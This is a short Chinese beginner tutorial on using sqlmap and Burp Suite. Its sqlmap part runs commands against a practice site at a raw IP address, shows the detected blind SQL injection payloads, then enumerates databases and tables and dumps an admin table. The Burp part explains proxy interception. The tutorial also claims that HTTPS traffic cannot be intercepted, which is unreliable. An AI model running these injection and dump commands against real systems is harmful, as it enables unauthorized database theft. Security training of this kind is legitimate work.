Sqlmap的基础使用
什么是sqlmap?
sqlmap是一款实现自动化渗透测试攻击的工具
具体操作细节:
首先打开你所下载的sqlmap的文件夹
然后在上方的地址处输入cmd
这样可以快速创建一个在当前文件夹的cmd在安装了python环境的前提下,输入python sqlmap.py运行sqlmap
输入命令python sqlmap.py -u “你认为存在sql注入的url”
这里我们以猫舍为例59.63.200.79:8003/?id=1
看到这个提示,说明这是个mysql数据库
(这里Y大写说明默认回车就是Y)
我们这里按回车
这里结果显示:
1.根据id=1 and 4456-4456
判断出布尔盲注
2.根据id=1 and (select 2776 from (select(sleep(5)))wgoU)
判断出时间盲注
用这条命令获得数据库名:
python sqlmap.py -u “59.63.200.79:8003/?id=1” --dbs
得到三个数据库名information_schema,maoshe,test
再用这条命令获取maoshe这个数据库里的表名:
python sqlmap.py -u “59.63.200.79:8003/?id=1” -D maoshe --tables
获取四个表名:
admin,dirs,news,xss
再用这条命令获取列名:
python sqlmap.py -u “59.63.200.79:8003/?id=1” -D maoshe -T admin --columns
一般我们不这样用,我们用这条语句:
python sqlmap.py -u “59.63.200.79:8003/?id=1” -D maoshe -T admin --dump
这是一个偷库的过程(是一个很危险的过程,建议不要用)
具体会将这个库的信息保存到这个文件夹中,可以通过这个路径进行查询
Burpsuite
什么是Burpsuite?
Burpsuite是基于抓包的攻击平台
什么又是抓包?
抓包就是将两个人传递的数据包中途拦截下来,可以对此数据包进行篡改,重放,跑包等操作
具体操作:
找到扩展程序
首先打开以及装好的burp,选择代理->选项->勾选8080端口
随便找到一个后台登录的页面
打开代理
点击拦截请求
刷新页面
会得到一个数据包
注意:https的网站不能抓包